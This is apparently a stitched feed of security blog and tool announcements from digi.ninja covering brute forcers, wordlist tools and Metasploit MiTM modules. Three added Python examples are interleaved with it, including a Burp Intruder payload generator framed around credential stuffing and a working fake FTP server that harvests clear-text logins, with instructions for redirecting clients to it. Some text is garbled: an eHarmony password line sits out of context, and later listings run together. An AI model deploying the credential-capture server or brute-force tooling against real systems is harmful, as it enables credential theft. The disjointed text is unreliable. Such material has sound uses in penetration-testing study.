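The Sitemap2Proxy description above is the whole recipe: parse the sitemap, request every URL through the intercepting proxy, and (since the later release) tally the response codes. As an added Python example, not the tool's own Ruby code, the following does that with the standard library; the sample sitemap and sitemap index are constructed, and the fetch function is injectable so the parsing and statistics run offline while `make_fetcher` builds the real proxied fetcher.

```python
"""Parse a sitemap (urlset or sitemap index) and replay every URL through a
proxy, keeping response-code stats. Added example, not Sitemap2Proxy code;
the sample documents are constructed."""
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET
from collections import Counter

NS = {"sm": "http://www.sitemaps.org/schemas/sitemap/0.9"}

SAMPLE_SITEMAP = """<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url><loc>http://www.example.com/</loc></url>
  <url><loc>http://www.example.com/about</loc></url>
  <url><loc>http://www.example.com/admin/old_backup.php</loc></url>
  <url><loc>http://www.example.com/about</loc></url>
</urlset>"""

SAMPLE_INDEX = """<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <sitemap><loc>http://www.example.com/sitemap-pages.xml</loc></sitemap>
  <sitemap><loc>http://www.example.com/sitemap-news.xml</loc></sitemap>
</sitemapindex>"""


def is_index(xml_text):
    """True for a sitemap index, whose <loc>s are further sitemaps rather than pages."""
    return ET.fromstring(xml_text).tag.endswith("sitemapindex")


def parse_sitemap(xml_text):
    """Ordered, de-duplicated <loc> values from a urlset or a sitemap index."""
    seen, urls = set(), []
    for loc in ET.fromstring(xml_text).iterfind(".//sm:loc", NS):
        url = (loc.text or "").strip()
        if url and url not in seen:
            seen.add(url)
            urls.append(url)
    return urls


def make_fetcher(proxy):
    """Fetcher sending every request via proxy, e.g. 'http://127.0.0.1:8080' for Burp or ZAP."""
    opener = urllib.request.build_opener(
        urllib.request.ProxyHandler({"http": proxy, "https": proxy}))

    def fetch(url):
        try:
            with opener.open(url, timeout=10) as resp:
                return resp.getcode()
        except urllib.error.HTTPError as err:
            return err.code
    return fetch


def replay(urls, fetch):
    """Request each URL; return ({url: status}, Counter of status codes)."""
    results = {url: fetch(url) for url in urls}
    return results, Counter(results.values())


def crawl(xml_text, fetch_text, fetch):
    """Expand a sitemap index one level (fetch_text returns a child sitemap's XML) and replay."""
    urls = []
    if is_index(xml_text):
        for child in parse_sitemap(xml_text):
            urls.extend(parse_sitemap(fetch_text(child)))
    else:
        urls = parse_sitemap(xml_text)
    return replay(urls, fetch)


if __name__ == "__main__":
    results, stats = replay(parse_sitemap(SAMPLE_SITEMAP), lambda u: 404 if "admin" in u else 200)
    print(results)
    print(dict(stats))
```

For real use pass `make_fetcher("http://127.0.0.1:8080")` so every page lands in the proxy's site map; the 404s and 403s in `stats` are often the interesting entries, as they are pages the admins listed but no longer serve or serve only to someone else.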
I ran it against the 1 million eHarmony passwords I've got and it looks like they do play a small part in some people's passwords.

Did you know Linux groups can have passwords?
http://digi.ninja/blog/group_password.php
Did you know Linux groups can have passwords? I didn't, but I do now; this is how you set them up.

Custom word list generator based on tweets
http://digi.ninja/projects/twofi.php
Twofi takes keywords and usernames and collects tweets based on these terms. It then extracts individual words and uses them to create a custom word list.

Are secure web frameworks reducing long term security?
http://digi.ninja/blog/web_frameworks.php
Why I think developers should always think about security, even when someone else is taking care of it for them.

Version 4.2 of CeWL which fixes a major problem found in the spider I'm using.
http://digi.ninja/projects/cewl.php
Turns out that the spider I'm using for CeWL only checks for links in anchor tags where the href uses double quotes, which means some links will have been missed. This release fixes that bug and adds the ability to do a depth 0 search, which lets you scan a single page.

This is part two of my write up of the findings from the Breaking In survey.
http://digi.ninja/projects/breaking_in_part_2.php
The second part of my write up of the conclusions I've taken from my Breaking In data. This part looks at the qualitative answers given, which give some meaning behind some of the stats.

This is part one of my write up of the findings from the Breaking In survey.
http://digi.ninja/projects/breaking_in_part_1.php
This post, along with part two coming soon, is an accompaniment to my BSides slides and the raw data which I published the other day. Here I try to summarise the results and add my commentary to them.

My slides for my BSides London talk on Breaking in to Security
http://digi.ninja/projects/breaking_in_bsides.php
At BSides London I presented the findings from the Breaking in to Security survey; here are my slides and a link to the data collected so far.

A set of interim results from my survey, "how do I get started in security?".
http://digi.ninja/projects/breaking_in_interim.php
Seeing as I had over 200 responses to the "Breaking In" survey in just 5 days, I've plucked out a couple of interesting stats from the responses and posted them to whet your appetite.

A copy of my slides from OWASP Leeds covering the perils of autoconfiguring web cams, with a bonus set presenting "What's in Amazon's buckets"
http://digi.ninja/blog/owasp_leeds.php
The story of how I analysed a new IP web camera and found how it automatically tried to punch a hole through my firewall and register itself with a dynamic DNS server to tell the world it was there. The slides also contain a bonus talk covering my blog post and project on "What's in Amazon's buckets".

Ever wanted to ask, or help answer, the question "how do I get started in security?".
http://digi.ninja/projects/breaking_in_1.php
This is my attempt to collect enough data to be able to answer the eternal question, "How do I get started in Information Security?". I've put together a questionnaire; I'll summarise the answers, hopefully present them at conferences and also summarise them here on the site.
A domain set up to help teach and explain DNS zone transfers.
http://digi.ninja/projects/zonetransferme.php
Ever found yourself in a position where you have to teach or explain DNS zone transfers but not had a domain to run the transfer on? This domain is set up to allow transfers and contains plenty of information to work with. I've also explained how I would interpret the information.

Pipal is a password analysis tool
http://digi.ninja/projects/pipal.php
Pipal analyses a cracked password list to help analysts spot patterns. Stats are generated on everything from the different lengths to the character types to the words that other words are based on.

How I found the CHECK Team Leader Web Application exam
http://digi.ninja/blog/check_ctl.php
A write up on my experiences taking, and passing, the CHECK Team Leader Web App Exam.

A description of the different attack modes in Burp Intruder
http://digi.ninja/blog/burp_intruder_types.php
Burp Intruder has four different attack modes; this post shows the differences between those four modes.

Using decompression to avoid filters
http://digi.ninja/blog/compress_filter_avoidance.php
Decompressing data to get it past filters such as IDS.

An application to parse files such as .DS_Store to reveal otherwise unlinked files on web sites.
http://digi.ninja/projects/fdb.php
File Disclosure Browser, an application to parse files such as .DS_Store to reveal otherwise unlinked files on web sites.

CeWL Version 4
http://digi.ninja/projects/cewl.php
An upgrade to Ruby version 1.9 and fixes to work with BackTrack 5.
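The Burp Intruder post above compares the four attack types. The difference between them is purely how payloads are combined across the marked positions, which is easy to see by generating the request set each one would send. As an added Python example, not from the post or from Burp, the following takes a request template with §-marked positions (the marker Burp uses) and yields the variants for sniper, battering ram, pitchfork and cluster bomb; the template and payload lists are constructed.

```python
"""Generate the requests each Burp Intruder attack type sends for a template
with §-marked payload positions. Added example, not from the post or Burp;
TEMPLATE and the payload lists are constructed."""
import itertools

TEMPLATE = ("POST /login HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
            "user=§admin§&pass=§letmein§")


def split_template(template, marker="§"):
    """Return (static chunks, base values): chunks[0] + v0 + chunks[1] + v1 + ... + chunks[-1]."""
    parts = template.split(marker)
    if len(parts) % 2 == 0:
        raise ValueError("unbalanced payload markers")
    return parts[0::2], parts[1::2]


def render(chunks, values):
    out = chunks[0]
    for value, chunk in zip(values, chunks[1:]):
        out += value + chunk
    return out


def intruder(template, attack, payload_sets):
    """Yield rendered requests for 'sniper', 'battering_ram', 'pitchfork' or 'cluster_bomb'."""
    chunks, base = split_template(template)
    n = len(base)
    if attack in ("sniper", "battering_ram"):
        if len(payload_sets) != 1:
            raise ValueError(f"{attack} takes exactly one payload set")
        payloads = payload_sets[0]
        if attack == "sniper":            # one position at a time, others keep their base value
            for i in range(n):
                for p in payloads:
                    yield render(chunks, base[:i] + [p] + base[i + 1:])
        else:                             # battering ram: the same payload in every position
            for p in payloads:
                yield render(chunks, [p] * n)
    elif attack in ("pitchfork", "cluster_bomb"):
        if len(payload_sets) != n:
            raise ValueError(f"{attack} needs one payload set per position ({n})")
        if attack == "pitchfork":         # sets walked in step: (u1,p1), (u2,p2), ...
            combos = zip(*payload_sets)
        else:                             # cluster bomb: every combination
            combos = itertools.product(*payload_sets)
        for combo in combos:
            yield render(chunks, list(combo))
    else:
        raise ValueError(f"unknown attack type {attack!r}")


def count(template, attack, payload_sets):
    """Number of requests the attack would send; useful before pointing it at a live target."""
    return sum(1 for _ in intruder(template, attack, payload_sets))


if __name__ == "__main__":
    users, passwords = ["admin", "root"], ["letmein", "Password1", "admin"]
    for attack, sets in [("sniper", [passwords]), ("battering_ram", [passwords]),
                         ("pitchfork", [users, passwords]), ("cluster_bomb", [users, passwords])]:
        print(f"{attack:14s} {count(TEMPLATE, attack, sets):3d} requests")
```

The counts are the practical takeaway: with two positions and payload lists of sizes a and b, sniper sends a+b (using one list of size a for both positions: 2a), battering ram a, pitchfork min(a, b) and cluster bomb a times b, which is what decides whether a credential-stuffing run finishes in minutes or days.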
Wifi Honey
http://digi.ninja/projects/wifi_honey.php
Automation of setting up a bunch of APs and airodump-ng to work out what encryption a client is probing for.

Analysing Mobile Me
http://digi.ninja/blog/analysing_mobile_me.php
Analysis of the content I found when trawling Mobile Me accounts looking for public information.

Mobile Me Madness
http://digi.ninja/blog/mobile_me_madness.php
A brief description of how Mobile Me allows access to its file listings and how to interpret them.

A tool to brute force user accounts on Mobile Me
http://digi.ninja/projects/me_finder.php
This tool will brute force user accounts with Mobile Me and then enumerate files associated with any public accounts found.

Analysing Amazon's Buckets
http://digi.ninja/blog/analysing_amazons_buckets.php
Analysis of the content I found when trawling Amazon's buckets looking for public information.

What's in Amazon's buckets?
http://digi.ninja/blog/whats_in_amazons_buckets.php
The description of how I wrote a tool to brute force bucket names from the Amazon S3 system and then take it a step further.

A tool to brute force bucket names from Amazon S3
http://digi.ninja/projects/bucket_finder.php
This tool will brute force bucket names from Amazon's S3 system and then enumerate files associated with any public buckets found.

Going to WAR on Tomcat with Laundanum
http://digi.ninja/blog/tomcat_laundanum.php
A short how-to on using Laundanum to attack Tomcat servers and how to set up a lab to try it at home.
An update to my script to mine data out of Google Profiles
http://digi.ninja/projects/gpscan.php
Google Profile scraping can be used as part of recon work to gather staff lists; this script automates that process.

A little trick to extract stored FTP details
http://digi.ninja/blog/cleartext_creds.php
A little trick to extract stored FTP details by setting up a fake server and then capturing the clear text.

Double tunnels to help a colleague in distress.
http://digi.ninja/blog/double_tunnel.php
Setting up SSH tunnels to allow external access to an internal network.

Tiger Scheme Check Team Member Exam - A review of the Check Team Member exam.
http://digi.ninja/blog/tiger_ctm.php

A Meterpreter script to download wireless profiles from Windows 7 and Vista boxes.
http://digi.ninja/metasploit/getwlanprofiles.php

A short script to do frequency analysis on lines in a file.
http://digi.ninja/projects/counter.php
A short script to do frequency analysis on lines in a file, specifically designed for password reuse analysis.

When All You Can Do Is Read.
http://digi.ninja/blog/when_all_you_can_do_is_read.php
A look at what files are good to try to read when all you have is read-only access to a machine, i.e. no directory listing ability.

Nessus Through SOCKS Through Meterpreter.
http://digi.ninja/blog/nessus_over_sock4a_over_msf.php
Running a Nessus scan through a Meterpreter pivot using a SOCKS4 proxy.
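The stored-FTP-details trick above works because an FTP client sends USER and PASS in clear text to whatever host it has been pointed at, so a server that accepts every login receives the saved credentials. As an added Python example, not the post's own code, the following is such a server: the dialogue logic is kept in a small state class so it can be exercised without a network, and `serve` wraps it in a real threaded TCP listener. The banner hostname and the port (2121, since binding 21 needs root or a redirect) are assumptions.

```python
"""Fake FTP server that accepts any login and records the USER/PASS pair.
Added example, not the post's code; banner and port are assumptions."""
import socketserver

BANNER = "220 ftp.example.com FTP server ready\r\n"   # constructed banner


class FtpCapture:
    """State for one control connection: feed client lines, get server replies."""

    def __init__(self):
        self.user = self.password = None
        self.done = False

    def feed(self, line):
        verb, _, arg = line.rstrip("\r\n").partition(" ")
        verb = verb.upper()
        if verb == "USER":
            self.user = arg
            return "331 Password required\r\n"
        if verb == "PASS":
            self.password = arg
            return "230 Login successful\r\n"       # accept anything; the string is all we want
        if verb == "QUIT":
            self.done = True
            return "221 Goodbye\r\n"
        return "530 Not logged in\r\n"              # refuse everything else, keep it simple


def handle_session(commands):
    """Run a scripted dialogue offline; returns ((user, password), replies)."""
    session, replies = FtpCapture(), [BANNER]
    for line in commands:
        replies.append(session.feed(line))
        if session.done:
            break
    return (session.user, session.password), replies


class CaptureHandler(socketserver.StreamRequestHandler):
    captured = []   # (peer address, user, password), shared across connections

    def handle(self):
        session = FtpCapture()
        self.wfile.write(BANNER.encode())
        for raw in self.rfile:
            self.wfile.write(session.feed(raw.decode(errors="replace")).encode())
            if session.done:
                break
        CaptureHandler.captured.append((self.client_address[0], session.user, session.password))
        print("captured", CaptureHandler.captured[-1])


class CaptureServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True


def serve(host="0.0.0.0", port=2121):
    """Listen until interrupted; point the client's stored FTP profile at this host."""
    with CaptureServer((host, port), CaptureHandler) as server:
        server.serve_forever()


if __name__ == "__main__":
    serve()
```

Redirect the client's saved connection at the box running this (a hosts-file entry or a DNS answer is enough) and the credentials print as soon as it reconnects; the same idea works for any protocol that authenticates in the clear.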
A modular brute force tool currently supporting HTTP(S), MySQL and SSH.
http://digi.ninja/projects/rsyaba.php
A modular brute force tool currently supporting HTTP(S), MySQL and SSH. Written in Ruby and designed to be easily extendable by using off-the-shelf protocol libraries.

HTTP Banner Grabbing Beyond The Root
http://digi.ninja/blog/http_banner_grab_dir.php
HTTP banner grabbing beyond the root: where do you do your web banner grabbing?

Viewing Pages documents in Linux
http://digi.ninja/blog/pages_linux.php
A short shell script to display a document created in Pages in Linux.

Do you have a second hand Trojan in your pocket?
http://digi.ninja/blog/pocket_trojan.php
The Trojan in your pocket - Do you know what your phone is doing?

A custom wordlist generator with a twist.
http://digi.ninja/projects/rsmangler.php
A custom wordlist generator that creates permutations of all the input words as well as just manipulating them individually.

A Metasploit module to accompany my blog post on finding interesting data in MSSQL databases.
http://digi.ninja/metasploit/mssql_idf.php

Automating searching through MSSQL databases for interesting data.
http://digi.ninja/blog/finding_interesting_db_data.php
Automating looking through MSSQL databases to find interesting sounding column names. Once found, automating pulling back some sample data to give a feel as to whether it is worth investigating.
http://digi.ninja/blog/finding_interesting_db_data.php This scan result beats any I've seen from Nessus, Nikto or Nmap http://digi.ninja/blog/ultrasound.php This scan result beats any I've seen from Nessus, Nikto or Nmap. I'm going to be a daddy! http://digi.ninja/blog/ultrasound.php Karma comes into the modern age with patches for hostapd. http://digi.ninja/karma/index.php Karma was originally written for Madwifi and I then updated it to work with Madwifi-ng. This update adds the same functionality to hostapd. http://digi.ninja/karma/index.php A pair of Metasploit modules to do DHCP exhaustion attack and then act as a DNS MiTM. http://digi.ninja/metasploit/dns_dhcp.php My DHCP and DNS Metasploit attack modules, now fixed up to work with Ruby 1.9.x http://digi.ninja/metasploit/dns_dhcp.php Convert Nessus v2 reports to CSV for easier manipulation and reporting. http://digi.ninja/projects/nexcser.php Converts Nessus v2 reports to various CSV files to help with reporting and continued scanning. http://digi.ninja/projects/nexcser.php Kismet log manipulation with GISKismet http://digi.ninja/blog/giskismet_ignore_gps.php A patch to GISKismet so it will import Kismet data which doesn't include GPS positions. http://digi.ninja/blog/giskismet_ignore_gps.php Updated Metasploit sound module http://digi.ninja/metasploit/session_created.php Now with added verbosity, reads IP address and port of connecting clients. http://digi.ninja/metasploit/session_created.php Metasploit DNS MiTM and DHCP Exhaustion modules http://digi.ninja/metasploit/dns_dhcp_beta.php I've updated these to run with the latest version of Metasploit. http://digi.ninja/metasploit/dns_dhcp_beta.php OSSEC rules for handling Kismet alerts files http://digi.ninja/projects/ossec_kismet_rules.php Handle alerts generated by Kismet Newcore in OSSEC. 
http://digi.ninja/projects/ossec_kismet_rules.php Convert a CSV file to an OSSEC rules file http://digi.ninja/projects/ossec_rule_converter.php Save the effort of having to keep an XML file up-to-date and create your rules in a spreadsheet then convert to XML with my app. http://digi.ninja/projects/ossec_rule_converter.php Whats behind the door? http://digi.ninja/blog/door.php I really want to know what is behind this door. http://digi.ninja/blog/door.php Don't just see on screen that you've got a new Metasploit session, be told by a nice lady. http://digi.ninja/metasploit/session_created.php A patch for Metasploit to have it play a wav file telling you a new session has been created. Similar to the Core 'Agent Deployed'. http://digi.ninja/metasploit/session_created.php Would you give out your password? http://digi.ninja/blog/password_experiment.php A write up of an experiment where I asked a class to give me their passwords. http://digi.ninja/blog/password_experiment.php CeWL Version 3 http://digi.ninja/projects/cewl.php Now with JS redirect checking and a bug fix for an issue I found in the ruby spider gem http://digi.ninja/projects/cewl.php Calc IP Range http://digi.ninja/projects/calc_ip_range.php Given a IP address calculate the top and bottom of its available subnet range http://digi.ninja/projects/calc_ip_range.php #secvidofday http://digi.ninja/blog/secvidofday.php What is #secvidofday and why am I doing it? http://digi.ninja/blog/secvidofday.php My AP Collection http://digi.ninja/blog/ap_collection.php I'm going to be doing some AP testing and this is a small part of the collection. http://digi.ninja/blog/ap_collection.php Releasing KreiosC2 version 3 http://digi.ninja/kreiosc2/ KreiosC2 can now channel data over TinyURL and JPEG as well as the original Twitter. 
http://digi.ninja/kreiosc2/ The start of the PenTester Scripting project http://digi.ninja/blog/pentester_scripting.php How I got involved in yet another new project, this time the PenTester Scripting community wiki http://digi.ninja/blog/pentester_scripting.php Metasploit DNS MiTM and DHCP Exhaustion modules http://digi.ninja/metasploit/dns_dhcp_beta.php Two new beta Metasploit modules, one for DNS MiTM and one for DHCP Exhaustion attacks http://digi.ninja/metasploit/dns_dhcp_beta.php Cool new Micro SD reader http://digi.ninja/blog/microsd.php This Micro SD reader is so small it is only just larger than the USB connector it is built on http://digi.ninja/blog/microsd.php New KreiosC2 language pack http://digi.ninja/projects/kreiosc2.php#download Split KreiosC2 commands over multiple tweets, a very simple example language http://digi.ninja/projects/kreiosc2.php#download Blindly Installing VMs and Using Live CDs http://digi.ninja/blog.php Do you know what the VM or live CD you have just downloaded really contains and if you don't, how do you find out? http://digi.ninja/blog.php KreiosC2 released http://digi.ninja/ Launching KreiosC2, version 2 of Twitterbot with new name and new dynamic language options http://digi.ninja/ New site launched http://digi.ninja/ I've finally got round to styling the new site http://digi.ninja/